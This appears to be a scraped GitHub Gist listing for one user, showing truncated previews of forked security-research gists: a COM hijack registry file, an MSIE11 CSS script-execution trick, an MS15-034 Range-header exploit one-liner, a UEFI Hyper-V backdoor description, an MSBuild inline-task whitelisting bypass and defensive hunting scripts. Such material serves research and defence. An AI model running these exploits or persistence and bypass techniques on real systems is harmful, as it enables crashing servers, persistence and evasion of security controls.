Skip to content

Instantly share code, notes, and snippets.

hybriz /
Created Nov 25, 2017 — forked from caniszczyk/
Clone all repos from a GitHub organization
curl -s | ruby -rubygems -e 'require "json"; JSON.load( { |repo| %x[git clone #{repo["ssh_url"]} ]}'
View com_hijack.reg
Windows Registry Editor Version 5.00
@="C:\\Users\\Administrator\\Documents\\Visual Studio 2015\\Projects\\ClassLibrary2\\ClassLibrary2\\bin\\x86\\Debug\\ClassLibrary2.dll"
hybriz /
Created Nov 3, 2017 — forked from cure53/
The Scriptless Scriptlet - Or how to execute JavaScript from CSS in MSIE11 without using Scripts

The Scriptless Scriptlet

Or how to execute JavaScript from CSS in MSIE11 without using Scripts

Stop! This text is only interesting for you if you...

  • Like popping alerts in weird situations
  • Miss CSS expressions as much as we do
  • Have an unhealthy obsession for markup porn


hybriz / dg.ps1
Created Nov 3, 2017 — forked from darkoperator/dg.ps1
Device Guard Configuration
View dg.ps1
$s1 = (gwmi -List Win32_ShadowCopy).Create("C:\", "ClientAccessible")
$s2 = gwmi Win32_ShadowCopy | ? { $_.ID -eq $s1.ShadowID }
$d = $s2.DeviceObject + "\"
cmd /c mklink /d C:\scpy "$d"
New-CIPolicy -Level RootCertificate -FilePath C:\BasePolicy.xml -ScanPath C:\scpy -UserPEs
Remove-Item -Path C:\scpy -Force
Set-RuleOption –option 3 –FilePath C:\BasePolicy.xml
ConvertFrom-CIPolicy C:\BasePolicy.xml C:\BasePolicy.bin
Move-Item C:\BasePolicy.bin c:\Windows\System32\CodeIntegrity\SIPolicy.p7b -force
View ms15-034.cmd
powershell -com {$wr=[Net.WebRequest]::Create('');$wr.AddRange('bytes',18,18446744073709551615);$wr.GetResponse();$wr.close()}
hybriz / rpn-jit.c
Created Nov 3, 2017 — forked from anonymous/rpn-jit.c
RPN JIT Compiler
View rpn-jit.c
* Fibonacci example:
* (1) (2) +
* 0:0
* 1:1
* 20
#include <stdio.h>
#include <stdlib.h>
hybriz / DmaHvBackdoor.c
Created Nov 3, 2017 — forked from Cr4sh/DmaHvBackdoor.c
Hyper-V backdoor for UEFI
View DmaHvBackdoor.c
Part of UEFI DXE driver code that injects Hyper-V VM exit handler
backdoor into the Device Guard enabled Windows 10 Enterprise.
Execution starts from new_ExitBootServices() -- a hook handler
for EFI_BOOT_SERVICES.ExitBootServices() which being called by
winload!OslFwpKernelSetupPhase1(). After DXE phase exit winload.efi
transfers exeution to previously loaded Hyper-V kernel (hvix64.sys)
hybriz / LoadMethodScanner.ps1
Created Nov 3, 2017 — forked from mattifestation/LoadMethodScanner.ps1
A crude Load(byte[]) method scanner for UMCI bypass research
View LoadMethodScanner.ps1
# Author: Matthew Graeber (@mattifestation)
# Load dnlib with Add-Type first
# dnlib can be obtained here:
# Example: ls C:\ -Recurse | Get-AssemblyLoadReference
filter Get-AssemblyLoadReference {
param (
[Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
View pshell_template_embedded_script.xml
<Project ToolsVersion="4.0" xmlns="">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<FunctionName Condition="'$(FunctionName)' == ''">None</FunctionName>
<Cmd Condition="'$(Cmd)' == ''">None</Cmd>
<Target Name="Hello">
hybriz / Get-InjectedThread.ps1
Created Nov 3, 2017 — forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
View Get-InjectedThread.ps1
function Get-InjectedThread
Looks for threads that were created as a result of code injection.